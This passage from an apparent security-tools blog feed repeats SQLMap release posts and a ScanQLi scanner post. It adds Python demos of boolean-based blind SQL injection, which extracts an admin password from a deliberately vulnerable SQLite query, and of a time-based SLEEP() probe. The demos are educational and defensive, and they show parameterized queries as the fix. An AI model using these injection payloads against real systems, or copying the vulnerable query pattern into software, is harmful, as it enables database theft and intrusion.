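    return con


def user_exists_vulnerable(con, user_id) -> bool:
    """Vulnerable on purpose: the input is concatenated into the SQL text."""
    sql = f"SELECT 1 FROM users WHERE id = {user_id}"
    return con.execute(sql).fetchone() is not None


def user_exists_safe(con, user_id) -> bool:
    """Hardened form: a bound parameter can never alter the query structure."""
    row = con.execute("SELECT 1 FROM users WHERE id = ?", (user_id,)).fetchone()
    return row is not None


def blind_int(oracle, expr: str, hi: int = 255) -> int:
    """Binary-search the integer value (0..hi) of SQL expression `expr`.

    `oracle(payload)` returns True when the application behaves as if the injected
    condition held, which is the only signal a boolean-based blind injection gives.
    """
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"1 AND ({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(oracle, subquery: str) -> str:
    """Recover the string a scalar subquery returns, one binary search per character."""
    length = blind_int(oracle, f"length(({subquery}))")   # values longer than 255 chars are cut here
    return "".join(
        chr(blind_int(oracle, f"unicode(substr(({subquery}), {i}, 1))", 127))
        for i in range(1, length + 1)
    )


def extract_admin_hash(con):
    """Pull admin's password hash through the vulnerable query; returns (hash, request count)."""
    calls = {"n": 0}

    def oracle(payload: str) -> bool:
        calls["n"] += 1
        return user_exists_vulnerable(con, payload)

    digest = blind_extract(oracle, "SELECT pw_hash FROM users WHERE name = 'admin'")
    return digest, calls["n"]


if __name__ == "__main__":
    db = build_db()
    print("tautology through the vulnerable query:", user_exists_vulnerable(db, "999 OR 1=1"))
    print("same input through the safe query:     ", user_exists_safe(db, "999 OR 1=1"))
    print("blind-extracted hash and request count:", *extract_admin_hash(db))
```

Each character costs seven requests (a binary search over 128 code points) on top of the length probe, so the 32-character hash takes a few hundred requests; with a time-based blind technique every one of those requests additionally waits for the injected delay, which is why sqlmap's threading and its preference for faster techniques matter in practice.<br />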
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<b><span style="font-size: large;">Demo</span></b><br />
<div style="text-align: center;">
<script async="" id="asciicast-46601" src="https://asciinema.org/a/46601.js"></script>
</div>
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Translations</b></span><br />
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md" rel="nofollow" target="_blank">Bulgarian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md" rel="nofollow" target="_blank">Chinese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md" rel="nofollow" target="_blank">Croatian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md" rel="nofollow" target="_blank">French</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md" rel="nofollow" target="_blank">Greek</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md" rel="nofollow" target="_blank">Indonesian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md" rel="nofollow" target="_blank">Italian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md" rel="nofollow" target="_blank">Japanese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md" rel="nofollow" target="_blank">Portuguese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md" rel="nofollow" target="_blank">Spanish</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md" rel="nofollow" target="_blank">Turkish</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.3.10</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-21345563204120235172019-08-09T08:30:00.000-04:002019-08-09T08:30:01.109-04:00SQLMap v1.3.8 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-X_y3UTZPtEY/XUySCNtl9nI/AAAAAAAAP8g/fWDiZHjjXGI9oObGiTtO1-FMmZvoXwjuACLcBGAs/s1600/sqlmap_1.3.8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="536" data-original-width="601" height="570" src="https://1.bp.blogspot.com/-X_y3UTZPtEY/XUySCNtl9nI/AAAAAAAAP8g/fWDiZHjjXGI9oObGiTtO1-FMmZvoXwjuACLcBGAs/s640/sqlmap_1.3.8.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches, ranging from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where the relevant column names contain strings like name and pass.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<b><span style="font-size: large;">Demo</span></b><br />
<div style="text-align: center;">
<script async="" id="asciicast-46601" src="https://asciinema.org/a/46601.js"></script>
</div>
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Translations</b></span><br />
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md" rel="nofollow" target="_blank">Bulgarian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md" rel="nofollow" target="_blank">Chinese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md" rel="nofollow" target="_blank">Croatian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md" rel="nofollow" target="_blank">French</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md" rel="nofollow" target="_blank">Greek</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md" rel="nofollow" target="_blank">Indonesian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md" rel="nofollow" target="_blank">Italian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md" rel="nofollow" target="_blank">Japanese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md" rel="nofollow" target="_blank">Portuguese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md" rel="nofollow" target="_blank">Spanish</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md" rel="nofollow" target="_blank">Turkish</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.3.8</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-65636274979411689342019-07-02T09:30:00.000-04:002019-07-02T09:30:08.820-04:00SQLMap v1.3.7 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-aZz_tvFN7tU/XRqQbv82EyI/AAAAAAAAPfQ/b4akHPZafAALI96b0U5FmMMnfgZ188FDwCLcBGAs/s1600/sqlmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="622" src="https://1.bp.blogspot.com/-aZz_tvFN7tU/XRqQbv82EyI/AAAAAAAAPfQ/b4akHPZafAALI96b0U5FmMMnfgZ188FDwCLcBGAs/s1600/sqlmap.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where the relevant column names contain strings like <code>name</code> and <code>pass</code>.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
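<div style="text-align: justify;">
As an added example (written for this page, not code from the sqlmap project or from the original post), the script below shows what the <strong>boolean-based blind</strong> technique in the list above actually does. The target is a constructed stand-in: an in-memory SQLite table whose rows, the lookup functions <code>lookup_vulnerable</code> and <code>lookup_safe</code>, and the secret being recovered are all assumptions of this example. The attacker never sees query output, only whether the page says "found" or not, yet recovers a value one character at a time by bisecting the ASCII range, the same idea behind sqlmap's blind inference. The parameterized lookup is shown beside the vulnerable one: against it the same oracle always answers false and nothing leaks.</div>

```python
import sqlite3


def build_db():
    """Constructed sample backend: an in-memory SQLite DB with invented rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret!"), (2, "bob", "hunter2")])
    return conn


def lookup_vulnerable(conn, user_id):
    """Classic injection point: untrusted input pasted into the query text.
    Returns only whether a row was found (the 'page differs' signal)."""
    sql = "SELECT name FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchone() is not None


def lookup_safe(conn, user_id):
    """Hardened form: the value is bound by the driver and can never become SQL."""
    try:
        uid = int(user_id)
    except ValueError:
        return False  # garbage in the id is rejected, not executed
    row = conn.execute("SELECT name FROM users WHERE id = ?", (uid,)).fetchone()
    return row is not None


def extract_blind(oracle, subquery, max_len=32):
    """Recover the string SUBQUERY evaluates to using only the true/false
    answer of ORACLE. Each character costs 7 requests (bisection over 0..127).
    SQLite's substr() past the end yields '' and unicode('') is NULL, so the
    comparison is never true there and the search converges to 0: end of string."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"1 AND unicode(substr(({subquery}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


def demo():
    """Run the attack against both lookups; returns (leaked, blocked, requests)."""
    conn = build_db()
    secret = "SELECT password FROM users WHERE name='admin'"
    calls = {"n": 0}

    def counted_oracle(payload):
        calls["n"] += 1
        return lookup_vulnerable(conn, payload)

    leaked = extract_blind(counted_oracle, secret)
    blocked = extract_blind(lambda p: lookup_safe(conn, p), secret)
    return leaked, blocked, calls["n"]


if __name__ == "__main__":
    print(demo())
```

<div style="text-align: justify;">
The request count is the practical point: seven requests per character is cheap, which is why a boolean oracle is enough to dump a database, and why the fix is binding parameters rather than filtering the input.</div>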
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<b><span style="font-size: large;">Demo</span></b><br />
<div style="text-align: center;">
<script async="" id="asciicast-46601" src="https://asciinema.org/a/46601.js"></script>
</div>
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Translations</b></span><br />
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md" rel="nofollow" target="_blank">Bulgarian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md" rel="nofollow" target="_blank">Chinese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md" rel="nofollow" target="_blank">Croatian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md" rel="nofollow" target="_blank">French</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md" rel="nofollow" target="_blank">Greek</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md" rel="nofollow" target="_blank">Indonesian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md" rel="nofollow" target="_blank">Italian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md" rel="nofollow" target="_blank">Japanese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md" rel="nofollow" target="_blank">Portuguese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md" rel="nofollow" target="_blank">Spanish</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md" rel="nofollow" target="_blank">Turkish</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.3.7</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-11241454397081753432019-04-29T17:34:00.000-04:002019-04-29T17:34:09.145-04:00ScanQLi - Scanner To Detect SQL Injection Vulnerabilities<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-47y4IV5dDdw/XMURIKJzyjI/AAAAAAAAOtY/DA8ZpRFPlaU3e2dPYzGmXBymqq3rsIGYQCLcBGAs/s1600/ScanQLi_4_scanqli.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="257" data-original-width="934" height="176" src="https://2.bp.blogspot.com/-47y4IV5dDdw/XMURIKJzyjI/AAAAAAAAOtY/DA8ZpRFPlaU3e2dPYzGmXBymqq3rsIGYQCLcBGAs/s640/ScanQLi_4_scanqli.jpeg" width="640" /></a></div>
<br />
<div style="text-align: justify;">
ScanQLi is a simple SQL <a href="https://www.kitploit.com/search/label/Injection" target="_blank" title="injection">injection</a> <a href="https://www.kitploit.com/search/label/Scanner" target="_blank" title="scanner">scanner</a> with some additional features. This tool can't exploit the SQLi, it only detects them. <em>Tested on <a href="https://www.kitploit.com/search/label/Debian" target="_blank" title="Debian">Debian</a> 9</em></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-size: large;"><b>Features</b></span></div>
<ul>
<li style="text-align: justify;"> Classic<br />
</li>
<li style="text-align: justify;"> Blind<br />
</li>
<li style="text-align: justify;"> Time based<br />
</li>
<li style="text-align: justify;"> <em>GBK (soon)</em><br />
</li>
<li style="text-align: justify;"> Recursive <a href="https://www.kitploit.com/search/label/Scan" target="_blank" title="scan">scan</a> (follow all hrefs of the scanned web site)<br />
</li>
<li style="text-align: justify;"> Cookies integration<br />
</li>
<li style="text-align: justify;"> Adjustable wait delay between requests<br />
</li>
<li style="text-align: justify;"> Ignore given URLs</li>
</ul>
<a name='more'></a><br />
<span style="font-size: large;"><b>Prerequisites</b></span><br />
<strong>1.</strong> Install git tool<br />
<pre><code>apt update
apt install git</code></pre>
<strong>2.</strong> Clone the repo.<br />
<pre><code>git clone https://github.com/bambish/ScanQLi</code></pre>
<strong>3.</strong> Install python required libs<br />
<pre><code>apt install python-pip
cd ScanQLi
pip install -r requirements.txt</code></pre>
<em>For python3 please install <strong>python3-pip</strong> and use <strong>pip3</strong></em><br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
<pre><code>./scanqli -u [URL] [OPTIONS]</code></pre>
<br />
<span style="font-size: large;"><b>Examples</b></span><br />
Simple url scan with output file<br />
<pre><code>python scanqli.py -u 'http://127.0.0.1/test/?p=news' -o output.log</code></pre>
Recursive URL <a href="https://www.kitploit.com/search/label/Scanning" target="_blank" title="scanning">scanning</a> with cookies<br />
<pre><code>python scanqli.py -u 'https://127.0.0.1/test/' -r -c '{"PHPSESSID":"4bn7uro8qq62ol4o667bejbqo3" , "Session":"Mzo6YWMwZGRmOWU2NWQ1N2I2YTU2YjI0NTMzODZjZDVkYjU="}'</code></pre>
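<div style="text-align: justify;">
Added example, not ScanQLi's own code: how the <strong>Time based</strong> check and the <strong>adjustable wait delay between requests</strong> listed above fit together. A delay is only meaningful relative to a measured baseline, and it should be confirmed with a second, different delay so that a slow network hop is not mistaken for an injected sleep. The target here is a constructed stand-in (<code>fake_target</code>) that sleeps only when a MySQL-style <code>SLEEP(n)</code> appears in the parameter; the function names, sample sizes and the 80% thresholds are assumptions of this example.</div>

```python
import re
import statistics
import time


def fake_target(vulnerable, base_latency=0.02):
    """Constructed stand-in for an HTTP endpoint. Returns a request function
    that takes the parameter value and simulates the server's response."""
    def request(value):
        time.sleep(base_latency)  # normal processing time of the page
        m = re.search(r"sleep\((\d+(?:\.\d+)?)\)", value, re.IGNORECASE)
        if vulnerable and m:      # the injected SLEEP() really executes
            time.sleep(float(m.group(1)))
        return "<html>ok</html>"
    return request


def timed(request, value):
    """Wall-clock time of one request, in seconds."""
    start = time.perf_counter()
    request(value)
    return time.perf_counter() - start


def probe_time_based(request, delay=0.15, samples=3, wait=0.0):
    """True only if the injected delay shows up above the baseline AND a
    doubled delay roughly doubles the gap (rules out a single slow response).
    `wait` is the pause between requests, like ScanQLi's adjustable delay."""
    def measure(value):
        runs = []
        for _ in range(samples):
            runs.append(timed(request, value))
            time.sleep(wait)
        return statistics.median(runs)  # median resists one-off spikes

    baseline = measure("1")
    first = measure(f"1 AND SLEEP({delay})")
    if first - baseline < 0.8 * delay:
        return False
    second = measure(f"1 AND SLEEP({2 * delay})")
    return second - baseline >= 0.8 * 2 * delay


if __name__ == "__main__":
    print("vulnerable target:", probe_time_based(fake_target(True)))
    print("clean target:     ", probe_time_based(fake_target(False)))
```

<div style="text-align: justify;">
On a real engagement the same structure applies, with larger delays on noisy links and a longer <code>wait</code> when the target rate-limits; skipping the confirmation step is the usual source of false positives in home-grown time-based checks.</div>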
<br />
<br />
